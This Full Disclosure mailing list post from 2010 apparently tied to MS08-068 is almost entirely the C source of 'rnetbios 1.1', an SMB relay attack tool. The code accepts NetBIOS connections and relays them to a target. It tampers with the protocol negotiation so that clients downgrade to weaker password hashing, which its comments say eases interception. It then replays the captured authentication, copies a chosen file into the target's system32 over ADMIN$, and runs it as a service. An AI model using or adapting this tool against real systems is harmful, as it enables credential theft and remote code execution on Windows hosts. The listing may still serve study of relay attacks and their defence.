Full Disclosure mailing list archives
rnetbios1.1 and about ms08-068
From: yuange <yuange1975 () hotmail com>
Date: Fri, 31 Dec 2010 13:43:57 +0000
http://hi.baidu.com/yuange1975/blog/item/c4d825ecf55f373562d09f03.html #include <windows.h> #include <winsock.h> #include <stdio.h> #include <string.h> #include <winnetwk.h> #pragma comment(lib,"ws2_32") #pragma comment(lib,"Mpr.lib") #define BINDNUM 10 #define THREADNUM BINDNUM #define SERVERPORT 139 #define BUFFSIZE 0x4000 typedef struct rserver{ int socketclient; int socketserver; int socketconnects; int socketconnectd; // struct sockaddr_in iprnetbios; // struct sockaddr_in ippsexec; SOCKET ipclient; SOCKET iprnetbios; SOCKET ippsexec; SOCKET ipdest; // BOOL rself; // SOCKET iprnetbios; } RSERVER; typedef struct rnet{ int fd; int fd2; int fd3; int fd4; int long72; int *long72add; int long73ok; int *long73okadd; int recvbytes; char *buff; char *buff72; char *buff73; char *buff73ok; char *filename; char *namereq; char *namereturn; char *ipbuff; char *namebuff; char *buffgetname; char *buff0x82; BOOL loginok; } RNET; typedef struct psinfo{ char *ip; char *filename; }PSINFO; void psexec(PSINFO *psinfo); void rnetbios(RSERVER *rinfo); void rnetbiosthread(void *rinfo ); void nameuncode(char *namebuff,char *ipbuff); void changepass(char *buff,char *buff73); int waitfd4(RNET *rnetinfo,RSERVER *rinfoadd); BOOL rnetchangepacket(RNET *rnetinfo); BOOL rnetchangepacket2(RNET *rnetinfo); int newsend(int fd,char *buff,int size,int flag); int main(int argc, char **argv) { RSERVER rinfo[THREADNUM]; int fd2; int fd3[BINDNUM]; struct sockaddr_in s_in1,s_in2,s_in3,s_in4; struct hostent *he; int i; //,randnum; int result; BOOL loginhimself; SOCKET d_ip,bindip; WSADATA wsaData; DWORD ThreadID; printf("\n rnetbios ver 1.1."); printf("\n copy by yuange 2000.4.7."); printf("\n rcopy 2002.10.14."); printf("\n welcome to my homepage http://yuange.yeah.net."); printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind ip2] [rnetbios client ip][new can netbios ip]",argv[0]); printf("\n example:%s 0 192.168.5.9 192.168.6.9 192.168.7.9",argv[0]); // printf("\n when somebody file:\\yourip,your host will rnetbios to the [ip] \n or his source ip if you haven't specified [ip] address"); // printf("\n After he login ,you can file:\\127.0.0.1 to the [ip] .\n "); // psexec(1); if(argc<5){ printf("\n error!\n"); printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind ip2] [rnetbios client ip][new can netbios ip]",argv[0]); printf("\n\n"); exit(1); } result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(2); } /* for(i=0,j=0;i<16;++i){ name=servername[i] ; if(name==0) j=1; if(j==1) name=0x20; namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A'; namebuff[2*i+6]= (name & 0x000F) + 'A'; } namebuff[37]=0; */ d_ip=-1; d_ip = inet_addr(argv[1]); if(d_ip==-1){ he = gethostbyname(argv[1]); if(!he) printf("\n Can't get the ip of %s !\n",argv[1]); //server); else memcpy(&d_ip, he->h_addr, sizeof(d_ip)); } if(d_ip==0) d_ip=-1; if(d_ip==-1){ loginhimself=1; printf("\n rnetbios to the netbios ip."); } else { loginhimself=0; printf("\n rnetbios to %s",argv[1]); //server); } s_in1.sin_addr.s_addr=d_ip; fd2 = socket(AF_INET, SOCK_STREAM,0); s_in2.sin_family = AF_INET; s_in2.sin_port = htons(SERVERPORT); s_in2.sin_addr.s_addr = 0; s_in2.sin_addr.s_addr = inet_addr(argv[2]); if(s_in2.sin_addr.s_addr==0||s_in2.sin_addr.s_addr==-1){ printf("\n\n argv[2] ip error. use the ip: 192.168.0.2"); s_in2.sin_addr.s_addr = inet_addr("192.168.0.2"); } i=bind(fd2,&s_in2, sizeof(s_in2)); if(i<0){ i=WSAGetLastError(); printf("\n bind error 0x%x",i); exit(1); } i=listen(fd2,100); if(i<0){ i=WSAGetLastError(); printf("\n bind error 0x%x",i); exit(1); } s_in3.sin_family = AF_INET; s_in3.sin_port = htons(SERVERPORT); s_in3.sin_addr.s_addr = 0; s_in3.sin_addr.s_addr = inet_addr(argv[3]); if(s_in3.sin_addr.s_addr==0||s_in3.sin_addr.s_addr==-1){ printf("\n\n argv[3] ip error. use the ip: 192.168.0.3"); s_in3.sin_addr.s_addr = inet_addr("192.168.0.3"); } bindip=s_in3.sin_addr.s_addr; for(i=0;i<BINDNUM;++i){ fd3[i] = socket(AF_INET, SOCK_STREAM,0); bind(fd3[i],&s_in3, sizeof(s_in3)); listen(fd3[i],10); s_in3.sin_addr.s_addr=ntohl(htonl(s_in3.sin_addr.s_addr)+1); } s_in4.sin_addr.s_addr = 0; s_in4.sin_addr.s_addr = inet_addr(argv[4]); if(s_in4.sin_addr.s_addr==0||s_in4.sin_addr.s_addr==-1){ printf("\n\n argv[4] ip error. use the ip: 192.168.0.4"); s_in4.sin_addr.s_addr = inet_addr("192.168.0.4"); } for(i=0;i<THREADNUM;++i){ rinfo[i].socketclient=fd2; rinfo[i].socketserver=fd3[i]; rinfo[i].ipclient=s_in2.sin_addr.s_addr; rinfo[i].iprnetbios=ntohl(htonl(bindip)+i); rinfo[i].ippsexec=s_in4.sin_addr.s_addr; rinfo[i].ipdest=d_ip; CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)rnetbiosthread,(LPVOID)&rinfo[i],(DWORD)0,(LPDWORD)&ThreadID); } Sleep(0x7fffffff); // closesocket(fd1); closesocket(fd2); // closesocket(fd3); // closesocket(fd4); WSACleanup( ); return(0); } void psexec(PSINFO *info) { /* SECURITY_ATTRIBUTES sa; PROCESS_INFORMATION ProcessInformation; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; STARTUPINFO siinfo; */ PSINFO psinfo=*info; NETRESOURCE lpNetResource; int fd1,i; // char *ip2; char cmdstr[0x100]; char res[0x100]; char filename[0x100]; char tempfilename[0x100]; char ser[0x100]; // char *name="cc.exe"; char *user="Administrator"; char *pass="test"; SC_HANDLE scm,svc; char *cmdstrformat="psexec.exe \\\\%s -u Administrator -p test -s cmd.exe"; // char *cmdstrformat="\\\\%s\\admin$ "; // fd1=*(int *)(ip); // ip2=*(int *)(ip+4)+8; // ip2="192.168.70.29"; wsprintf(cmdstr,cmdstrformat,psinfo.ip); //"127.0.0.1"); // GetTempPath(0x100,tempfilename); GetTempFileName(tempfilename,NULL,NULL,tempfilename); DeleteFile(tempfilename); for(i=strlen(tempfilename);i>0;--i){ if(tempfilename[i]=='\\') { strcpy(tempfilename,tempfilename+i+1); break; } } // system(cmdstr); // ExitThread(0); wsprintf(res,"\\\\%s\\admin$",psinfo.ip); wsprintf(filename,"\\\\%s\\admin$\\system32\\%s",psinfo.ip,tempfilename); wsprintf(ser,"\\\\%s",psinfo.ip); lpNetResource.dwScope=RESOURCE_CONNECTED; lpNetResource.dwType =RESOURCETYPE_DISK; lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE; lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE; lpNetResource.lpLocalName=NULL; lpNetResource.lpRemoteName=res; lpNetResource.lpComment=NULL; lpNetResource.lpProvider=NULL; i=WNetAddConnection2A(&lpNetResource,user,pass,CONNECT_UPDATE_PROFILE); scm=OpenSCManager(ser,NULL,SC_MANAGER_CREATE_SERVICE); printf("\n scm=0x%x err=0x%x ip=%s",scm,GetLastError(),psinfo.ip); svc=CreateService(scm,tempfilename,tempfilename,SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_IGNORE, tempfilename,NULL,NULL,NULL,NULL,NULL); if(svc==NULL) svc=OpenService(scm,tempfilename,SERVICE_ALL_ACCESS); printf("\n svc=0x%x err=0x%x",svc,GetLastError()); i=CopyFile(psinfo.filename,filename,TRUE); printf("\n copy file error=0x%x ip=%s", GetLastError(),psinfo.ip); i=StartService(svc,0,NULL); printf("\n i=0x%x error=0x%x",i,GetLastError()); i=DeleteService(svc); DeleteFile(filename); // printf("\n cmdstr=%s\n",cmdstr); /* sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0); ZeroMemory(&siinfo,sizeof(siinfo)); siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1; // CreateProcess(NULL,&cmdstr,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation); */ // system(cmdstr); // printf("\n psexec end. closesocket fd1=0x%x",fd1); CloseServiceHandle(scm); CloseServiceHandle(svc); // closesocket(fd1); // closesocket(fd2); i=WNetCancelConnection2A(res,CONNECT_UPDATE_PROFILE,TRUE); ExitThread(0); printf("\n Exitthread erro1 !"); return; } void rnetbiosthread(RSERVER *rinfoadd) { RSERVER rinfo; int i,fd1,fd2; struct sockaddr_in s_in1,s_in2; SOCKET dip; rinfo=*rinfoadd; // memcpy(&rinfo,rinfoadd,sizeof(rinfo)); dip=rinfo.ipdest; while(1) { i=sizeof(struct sockaddr); fd1=accept(rinfo.socketclient,&s_in1,&i); if(s_in1.sin_addr.s_addr!=rinfo.ipclient) { if(rinfo.ipdest==-1) dip=s_in1.sin_addr.s_addr; fd2 = socket(AF_INET, SOCK_STREAM,0); s_in2.sin_family = AF_INET; s_in2.sin_port = htons(SERVERPORT); s_in2.sin_addr.s_addr = dip; printf("\n Connect %s",inet_ntoa(s_in2.sin_addr)); if(!connect(fd2, (struct sockaddr *)&s_in2, sizeof(struct sockaddr_in))) { printf("\n Connect %s ok!",inet_ntoa(s_in2.sin_addr)); rinfo.socketconnects=fd1; rinfo.socketconnectd=fd2; rnetbios(&rinfo); // printf("\n rnetbios return"); } else printf("\n Connect %s error!",inet_ntoa(s_in2.sin_addr)); closesocket(fd2); } closesocket(fd1); } ExitThread(1); } void rnetbios(RSERVER *rinfoadd) { RNET rnetinfo; RSERVER rinfo=*rinfoadd; // PSINFO psinfo; int fd,fd2,fd3,fd4; struct sockaddr_in s_in1,s_in2,s_in4; char buff[BUFFSIZE+1]; char buff72[BUFFSIZE+1]; char buff73[BUFFSIZE+1]; char buff73ok[BUFFSIZE+1]; char filename[BUFFSIZE+1]; char buff0x82[]={0x82,0,0,0}; char namereq[]={0x81,0,0,0}; // int long72=0; u_short name; char buffgetname[]={0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,0x41,0x41,0x41,0x41,0x41,0x41 ,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,0x00,0x01}; char namebuff[]={0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,0x46,0x48,0x45,0x50,0x46 ,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,00 ,0x20,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x43,0x41,0x43,0x41,0x43,0x41 ,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,00 }; char ipbuff[0x100]; char namereturn[]={0x82,0,0,0,0,0}; struct sockaddr addr2; int i,j,k,exitcode; //,k,l,ii; // int usernameaddress1; // int usernameaddress2; // int strflg1,strflg2; DWORD ThreadID; HANDLE threadhandle=0; // BOOL loginok; s_in1.sin_addr.s_addr=rinfo.iprnetbios; wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr)); nameuncode(namebuff,ipbuff); fd=fd2; fd2=rinfo.socketconnects; fd3=rinfo.socketconnectd; fd4=0; rnetinfo.fd2=fd2; rnetinfo.fd3=fd3; rnetinfo.fd4=fd4; rnetinfo.buff=buff; rnetinfo.buff72=buff72; rnetinfo.buff73=buff73; rnetinfo.buff73ok=buff73ok; rnetinfo.filename=filename; rnetinfo.buffgetname=buffgetname; rnetinfo.ipbuff=ipbuff; rnetinfo.namebuff=namebuff; rnetinfo.buff0x82=buff0x82; rnetinfo.namereq=namereq; rnetinfo.long72add=&rnetinfo.long72; rnetinfo.long72=0; rnetinfo.long73okadd=&rnetinfo.long73ok; rnetinfo.long73ok=0; rnetinfo.loginok=FALSE; // printf("\n Connect %s",inet_ntoa(s_in2.sin_addr)); i = 1; ioctlsocket(fd2, FIONBIO, &i); i = 1; ioctlsocket(fd3, FIONBIO, &i); i = 1; ioctlsocket(rinfo.socketserver, FIONBIO, &i); ThreadID=0; memset(buff,0,BUFFSIZE); memset(filename,0,BUFFSIZE); while(1) { if(rnetinfo.loginok==TRUE) { i=GetExitCodeThread(threadhandle,&exitcode); if(i==1&&exitcode!=STILL_ACTIVE){ // printf("\n psexec exit 0x%x code",exitcode); break; } } Sleep(5); // if(rnetinfo.loginok==TRUE) recv(fd2,buff,BUFFSIZE,0); i=recv(fd,buff,BUFFSIZE,0); if(i<=0&&WSAGetLastError()==0x2746) { // printf("\n recv fd 0x%x bytes. error=0x2746",i); break; } if(i>0) { rnetinfo.recvbytes=i; if(rnetchangepacket(&rnetinfo)==TRUE) { threadhandle=waitfd4(&rnetinfo,&rinfo); } memset(buff,0,BUFFSIZE); } i=recv(fd3,buff,BUFFSIZE,0); if(i<=0&&WSAGetLastError()==0x2746) { // printf("\n recv fd3 0x%x bytes. error=0x2746",i); break; } if(i>0) { rnetinfo.recvbytes=i; if(rnetchangepacket2(&rnetinfo)==TRUE) { threadhandle=waitfd4(&rnetinfo,&rinfo); } memset(buff,0,BUFFSIZE); } if(rnetinfo.loginok==FALSE) fd=fd2; else fd=rnetinfo.fd4; rnetinfo.fd=fd; } closesocket(fd2); closesocket(fd3); closesocket(rnetinfo.fd4); CloseHandle(threadhandle); return; } void nameuncode(char *namebuff,char *ipbuff) { int i,j; u_short name; char servername[]={"*SMBSERVER"}; for(i=0,j=0;i<16;++i){ name=ipbuff[i]; //servername[i] ; if(name==0) j=1; if(j==1) name=0x20; namebuff[2*i+0x27]= ( (name >> 4) & 0x000F ) + 'A'; namebuff[2*i+0x28]= (name & 0x000F) + 'A'; } for(i=0,j=0;i<16;++i){ name=servername[i] ; if(name==0) j=1; if(j==1) name=0x20; namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A'; namebuff[2*i+6]= (name & 0x000F) + 'A'; } namebuff[0x25]=0; namebuff[0x47]=0; return; } int newsend(int fd,char *buff,int size,int flag) { int j; int i = 0; ioctlsocket(fd, FIONBIO, &i); j=send(fd,buff,size,flag); i = 1; ioctlsocket(fd, FIONBIO, &i); return j; } void changepass(char *buff11,char *buff7311) { char *buff=*(int *)buff11; char *buff73=*(int *)buff7311; int usernameaddress1; int usernameaddress2; int strflg1,strflg2; u_short name; memcpy(buff+0x41,buff73+0x41,0x18); // copy password if(buff[0x35]==0x18) memcpy(buff+0x41+0x18,buff73+0x41+0x18,0x18); // copy the next password strflg1=buff73[0x0f]; strflg1&=0x80; if(strflg1!=0) strflg1=1; strflg2=buff[0x0f]; strflg2&=0x80; if(strflg2!=0) strflg2=1; //str is unicode ? usernameaddress1=0x41+0x18+buff73[0x35]+strflg1; usernameaddress2=0x41+0x18+buff[0x35]+strflg2; name=1; while(name!=0){ name=buff73[usernameaddress1]; if(strflg1==0) ++usernameaddress1; else usernameaddress1+=2; buff[usernameaddress2]=name; ++usernameaddress2; if(strflg2!=0) { ++usernameaddress2; buff[usernameaddress2]=0; } } // copy user name ,不够严谨,不过勉强能用。 } BOOL rnetchangepacket(RNET *rnetinfoadd) { char filename[0x100]; unsigned char name; int i,j,k; RNET rnetinfo=*rnetinfoadd; if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32) { i=*(WORD *)(rnetinfo.buff+0x41); if(i==0x05&&rnetinfo.recvbytes>0x4e&&rnetinfo.buff[0x4e]!=0) { memcpy(rnetinfo.filename,rnetinfo.buff+0x4e,rnetinfo.recvbytes-0x4e); // *(int *)(rnetinfo.buff+9)=0xc0000016; // rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0); // closesocket(rnetinfo.fd2); printf("\n get file name ok!"); return(TRUE); } if(i==0x01&&rnetinfo.recvbytes>0x54&&rnetinfo.buff[0x54]!=0) { memcpy(rnetinfo.filename,rnetinfo.buff+0x54,rnetinfo.recvbytes-0x54); // *(int *)(rnetinfo.buff+9)=0xc0000016; rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0); // closesocket(rnetinfo.fd2); printf("\n get file name ok!"); return(TRUE); } } if(rnetinfo.buff[0x8]==0x72) { if(rnetinfo.loginok==FALSE) { // memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes); memset(rnetinfo.buff+0xc,0,4); rnetinfo.long72=rnetinfo.recvbytes; //这儿是系统支持什么服务的标记,WIN2000与WINNT系统不一样。 //有一方是WINNT看一般就是0,而两方都是WIN2000后面协议的密码方式就不一样。 //设置成0,欺骗让其以WINNT的方式发送加密的密码,以好截获。但可能WIN2000支持不好。 // printf("\n fd2 recv smb 0x72 packet "); } else { memcpy(rnetinfo.buff72+0x1c,rnetinfo.buff+0x1c,8); memcpy(rnetinfo.buff,rnetinfo.buff72,rnetinfo.long72); // printf("\n send smb 0x72 packet ."); rnetinfo.buff[0x25]=5; //run in win9x.the win9x netbios client use //这儿客户端可能要WIN9X,不知道WINT。WIN2000怎么处理。 newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.long72,0); return(FALSE); rnetinfo.recvbytes=0; } } if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75) { if(rnetinfo.loginok==FALSE) { if(rnetinfo.buff[0x33]==0x18) { memcpy(rnetinfo.buff73,rnetinfo.buff,rnetinfo.recvbytes); } i=*(WORD *)(rnetinfo.buff+0x27); if(rnetinfo.buff[0x8]==0x75) i=0x20; j=*(unsigned char *)(rnetinfo.buff+0x4+i); i+=*(WORD *)(rnetinfo.buff+i+0x0b); i=i+2*j+7; memcpy(filename,rnetinfo.buff+i,sizeof(filename)); j=1; if(filename[1]==0) j=2; for(i=0,k=0;i<0x100;i+=j,++k) { name=filename[i]; filename[k]=name; // if(i==0&&name=='\\') k-=1; } for(i=strlen(filename);i>0;--i) { name=filename[i]; if(name=='\\') { strcpy(filename,filename+i+1); break; } } if(strcmp(filename,"IPC$")!=0&&strcmp(filename,"ADMIN$")!=0) { strcpy(rnetinfo.filename,filename); printf("\n file name=%s",filename); // closesocket(rnetinfo.fd2); // printf("\n the new get file name ok!"); return(TRUE); } } else{ if(rnetinfo.buff[0x33]==0x18) { // printf("\n send login ok packet."); // printf("\n send login ok packet."); // newsend(rnetinfo.fd,rnetinfo.buff73ok,rnetinfo.long73ok,0); // return; changepass(&rnetinfo.buff,&rnetinfo.buff73); memcpy(rnetinfo.buff+0x20,rnetinfo.buff73ok+0x20,2); //user id } } } if(memcmp(rnetinfo.buff,rnetinfo.namereq,3)==0) { if(rnetinfo.loginok==FALSE) { rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0); // printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes); } else { rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff0x82,0x6,0); // rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0); // printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes); } } else { if(rnetinfo.loginok==FALSE) rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0); else { // memcpy(rnetinfo.buff73+0x1c,rnetinfo.buff73ok+0x1c,8); rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0); } // printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.buff[8],rnetinfo.recvbytes); } return(FALSE); } BOOL rnetchangepacket2(RNET *rnetinfoadd) { RNET rnetinfo=*rnetinfoadd; if(rnetinfo.buff[0x8]==0x72) { if(rnetinfo.loginok==FALSE){ memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes); // memset(rnetinfo.buff+0xc,0,4); *rnetinfo.long72add=rnetinfo.recvbytes; } } if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75) { if(*(int *)(rnetinfo.buff+9)==0&&rnetinfo.buff73[0x33]==0x18&&rnetinfo.loginok==FALSE) { memcpy(rnetinfo.buff73ok,rnetinfo.buff,rnetinfo.recvbytes); *rnetinfo.long73okadd=rnetinfo.recvbytes; // rnetinfo.loginok=TRUE; // closesocket(rnetinfo.fd2); printf("\n now login ok!"); // rnetinfo.recvbytes=0; // return(TRUE); } } if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18) { // *(int *)(rnetinfo.buff+9)=0xc0000016; } rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.recvbytes,0); if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18) { // closesocket(rnetinfo.fd2); // return(TRUE); } // printf("\n send fd 0x%x 0x%x bytes.",rnetinfo.buff[8],rnetinfo.recvbytes); return(FALSE); } int waitfd4(RNET *rnetinfo,RSERVER *rinfoadd) { // RNET rnetinfo=*rnet; RSERVER rinfo=*rinfoadd; int i,j,k,threadhandle,exitcode; unsigned char name; char *ipbuff[0x100]; PSINFO psinfo; struct sockaddr_in s_in1,s_in2,s_in4; struct sockaddr addr2; DWORD ThreadID; rnetinfo->loginok=TRUE; s_in1.sin_addr.s_addr=rinfo.iprnetbios; wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr)); psinfo.ip=&ipbuff; /* i=*(WORD *)(rnetinfo->buff73+0x27); j=*(unsigned char *)(rnetinfo->buff73+0x4+i); i+=*(WORD *)(rnetinfo->buff73+i+0x0b); i=i+2*j+7; psinfo.filename=rnetinfo->buff73+i; j=1; if(psinfo.filename[1]==0) j=2; for(i=0,k=0;i<0x100;i+=j,++k) { name=psinfo.filename[i]; psinfo.filename[k]=name; // if(i==0&&name=='\\') k-=1; } for(i=strlen(psinfo.filename);i>0;--i) { name=psinfo.filename[i]; if(name=='\\') { strcpy(psinfo.filename,psinfo.filename+i+1); break; } } */ psinfo.filename=rnetinfo->filename; j=1; if(rnetinfo->filename[1]==0) j=2; for(i=0,k=0;i<0x100;i+=j,++k) { name=rnetinfo->filename[i]; rnetinfo->filename[k]=name; if(i==0&&name=='\\') k-=1; } printf("\n filename=%s\n",psinfo.filename); threadhandle=CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)psexec,(LPVOID)&psinfo,(DWORD)0,(LPDWORD)&ThreadID); // break; while(1){ Sleep(5); if(rnetinfo->loginok==TRUE) { i=GetExitCodeThread(threadhandle,&exitcode); if(i==1&&exitcode!=STILL_ACTIVE){ // printf("\n psexec exit 0x%x code",exitcode); break; } } i=sizeof(struct sockaddr); rnetinfo->fd4=accept(rinfo.socketserver,&addr2,&i); memcpy(&s_in4,&addr2,15); if(rnetinfo->fd4>0) { if(s_in4.sin_addr.s_addr!=rinfo.ippsexec){ printf("\n fd4 error."); closesocket(rnetinfo->fd4); } else { printf("\n fd4 ok! ip=%s",ipbuff); break; } } } return(threadhandle); }
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- rnetbios1.1 and about ms08-068 yuange (Dec 31)